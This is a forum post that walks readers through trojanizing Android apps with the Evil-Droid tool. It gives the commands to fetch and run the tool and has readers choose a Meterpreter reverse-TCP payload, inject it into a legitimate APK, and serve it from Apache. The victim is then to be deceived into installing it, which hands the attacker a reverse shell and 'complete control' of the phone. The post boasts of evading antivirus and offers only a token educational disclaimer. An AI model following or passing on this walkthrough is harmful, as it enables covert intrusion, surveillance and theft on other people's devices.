There was a hacking technique of android which i posted here in this forum recently using metasploit and having a backdoor installed in the android device. Now some people back lashed me on how noob the trick is (according to him) and it doesn’t bypass Anti virus and the trick is old as he said.
So, here is the Ultimate guide to hack any android device using the same backdoor technique but the process is totally automatic so its user-friendly. Don’t think that it doesn’t work as its an easy technique, only the process of automation made it so.
You may be able to automatically embed payloads or your RAT’s in the original APK file which you send as a trusted application to the client. You will mask the RAT as some useful APP and make them install and the system cannot detect it as harm because well, the original APK file is still usable and backdoor is completely hidden.
The author does not hold any responsibility for the bad use of this tool,
remember this is only for educational purpose.
Things you need:
A linux machine ( if you dont have this, I think you better should. Totally recommended)
All other dependencies will be automatically installed when you run this tool.
On the terminal:
- Install the tool by:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- set script execution permissions, chmod it .
chmod +x evil-droid
- run by
Once you run it, this is the time where it will auto install all dependencies you need. Wait a while and allow the framework to execute.
- Select 3 rd option where you need to install for New APK files which are coded latest.
- Set you LHOST (your IP)
- Set port to default like 1234
- Set whatever name you want for the APK.
- Select android/meterpreter/reverse_tcp
- This section is where you will select the original APK to inject payload. It maybe any app like launchers, Google Apps, i think you got me. Select that
- select Multi handler
- Thats it !! The APK will be saved and is ready to be transferred to your victim.
- Transfer this file to /var/www/html
- Start the apache2 server
ON VICTIM DEVICE
- Enter your LHOST into the URL bar and download the file remotely from the server and make your victim install that file
- You can do that yourself or you make your victim do that.
/// Some users DM’ed me that the backdoor still need to be installed and this is not a hack. well, good luck to you guys???
- After installation, reverse shell is already made to your linux system.
ON HACKING MACHINE
You will use general metasploit commands to run the handler and take control of the Android device. I mean complete control of the device.
You can refer to my other Android hacking thread for reference of commands to make the payload run.
Thats about the complete hack of the Android device. We went from creating custom backdoor or payload and injected into the Original literal APK file and made the victim installed it bypassing all the Anti virus hassles. As there is a real app embedded, there is literally less chance that the victim will uninstall the apk file.
This is the ultimate way to hack any android devices which works almost cent percent of times.
Use common sense to get out of situations where you are stuck. Im here to help you???
With power comes, great responsibilities.